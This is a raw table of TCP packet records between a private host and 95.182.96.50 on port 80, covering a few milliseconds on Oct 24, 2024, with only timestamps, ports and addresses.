Oct 24, 2024 13:54:22.680299997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680303097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680316925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680336952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680344105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680354118 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680361032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680376053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680381060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680392981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680394888 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680408001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680416107 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680433035 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680434942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680452108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680452108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680468082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680474997 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680486917 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680488110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680500984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680501938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680524111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680536985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680572987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680589914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680607080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680615902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680619955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680627108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680643082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680649996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680660009 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680665016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680680037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680689096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680700064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680716038 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680725098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680741072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680756092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680788994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680802107 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680809975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680825949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680841923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680843115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680857897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680860996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680874109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680880070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680891991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680891991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.680917025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.680942059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.681255102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681272030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681288004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681299925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.681320906 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.681507111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681524038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681540966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681550026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.681569099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681572914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.681587934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681605101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681618929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.681621075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681638002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681638002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.681646109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.681658983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.681679010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.681708097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681729078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681744099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681751966 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.681766033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.681771040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681776047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.681787968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681806087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681814909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.681823969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.681843042 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.681859970 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682023048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682049990 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682066917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682069063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682085991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682105064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682106972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682125092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682140112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682156086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682162046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682171106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682179928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682187080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682188988 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682195902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682204962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682220936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682240009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682262897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682276964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682293892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682310104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682312012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682336092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682337999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682349920 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682352066 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682368994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682373047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682387114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682390928 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682404041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682410002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682424068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682436943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682442904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682456970 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682462931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682481050 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682487965 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682496071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682498932 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682512999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682516098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682531118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.682537079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682549953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.682568073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683022022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683074951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683077097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683093071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683109999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683115959 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683130026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683146954 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683165073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683182001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683199883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683206081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683217049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683219910 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683234930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683242083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683248997 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683252096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683267117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683281898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683294058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683298111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683326960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683326960 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683350086 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683355093 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683370113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683372974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683389902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683391094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683412075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683418989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683424950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683437109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683454037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683480024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683480978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683496952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683500051 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683525085 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683526993 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683532953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683541059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683558941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683562040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683576107 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683577061 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683593035 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683595896 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683609962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683610916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683626890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683630943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683645010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683653116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683662891 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683679104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683679104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683680058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683696032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683696985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683713913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683717012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683732033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683738947 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683751106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683762074 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683764935 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683778048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683794975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683798075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683820963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683823109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683823109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683840036 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683861971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683867931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683886051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683885098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683902025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683903933 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683919907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683921099 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683937073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683943033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683955908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683957100 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683973074 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683975935 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.683989048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.683989048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684012890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684024096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684077024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684094906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684112072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684135914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684155941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684166908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684178114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684192896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684207916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684217930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684226036 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684236050 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684242964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684263945 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684290886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684351921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684389114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684434891 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684449911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684465885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684473038 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684484005 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684505939 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684519053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684573889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684601068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684617996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684629917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684647083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684653997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684667110 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684672117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684686899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684690952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684715986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684722900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684732914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684742928 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684750080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684753895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684765100 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684773922 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684782982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684787035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684801102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684802055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684820890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684823036 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684843063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684864044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684879065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684892893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684897900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684906006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684914112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684916019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684931993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684933901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684953928 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684971094 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.684977055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.684995890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685012102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685019016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.685029030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685033083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.685048103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685054064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.685065031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685066938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.685085058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685086012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.685106039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.685108900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685122967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685129881 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.685149908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.685158014 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.685185909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685199976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685214996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685240030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.685241938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685261965 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.685266018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685281992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.685283899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685301065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685301065 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.685318947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685332060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.685333014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.685342073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.685363054 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.685381889 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.726473093 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.726502895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.726524115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.726526022 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.726541042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.726551056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.726557016 CEST	49714	80	192.168.2.6	95.182.96.50
